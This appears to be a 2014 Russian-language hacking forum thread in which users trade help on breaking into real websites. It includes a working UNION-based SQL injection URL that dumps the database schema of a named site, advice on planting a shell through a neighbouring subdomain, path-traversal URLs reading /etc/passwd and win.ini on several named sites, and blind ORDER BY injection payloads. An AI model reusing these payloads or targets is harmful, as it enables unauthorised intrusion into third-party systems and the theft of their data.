 |
|
18.06.2014, 20:01
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Aniweste
Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.
Искал-искал и так не понял - откуда они подгружаются.
Есть какие-нибудь идеи?
а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?
|
|
|
18.06.2014, 21:05
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от qaz
а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?
Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.
|
|
|
|
18.06.2014, 21:49
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от er9j6@
Как залить шелл, какой вариант? Пароли сбрутить не удалось
Код:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+
Через соседа, где file_priv Y, например поддомен uha .
Mq=off
http://fisher.spb.ru/php.php
|
|
|
|
18.06.2014, 21:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Aniweste
Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.
та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов
|
|
|
|
18.06.2014, 22:05
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от qaz
та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов
Теперь сервак не падает.
Он выдаёт 408 на несколько секунд и дальше происходит одно из двух:
1. Либо восстанавливаются первоначальные файлы, либо
2. Ничего не происходит и новый текст так и не отображается
|
|
|
|
19.06.2014, 12:16
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
Провел на форуме:
182660
Репутация:
324
|
|
Помогите пожалуйста.
Не понимаю в чём дело.
Код:
http://dviu.ranepa.ru/index.php?page=..\..\..\..\..\..\..\windows\win.ini%00
http://www.lhc-facts.ch/index.php?page=../../../../../../../../../../etc/hosts%00
http://www.spaskrug-osetia.ru/index.php?page=../../../../../../../etc/hosts%00
http://klenovskoe.ru/index.php?page=../../../../../../../../../../etc/passwd%00
|
|
|
|
20.06.2014, 14:26
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
В чем может быть причина того, что на некоторых сайтах запрос:
Код:
order=1 rlike (SELECT (case when(1=1) then (select 1 union select 2) else 1 end))%23
всё время возвращает пустой результат (при 1=1 или 1=0).
Инъекция в order by. |
|
|
|
20.06.2014, 15:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
XAMEHA, при числе записи = 1 всё нормально:
Код:
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=0) then 0x28 else 1 end))
# Вернет 1
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=1) then 0x28 else 1 end))
# Вернет #1139 - Got error 'parentheses not balanced' from regexp
|
|
|
|
20.06.2014, 15:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
XAMEHA, спасибо за ссылку, так работает:
Код:
order=min(0 rlike if((%s),1,0x00))#
|
|
|
|
20.06.2014, 21:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
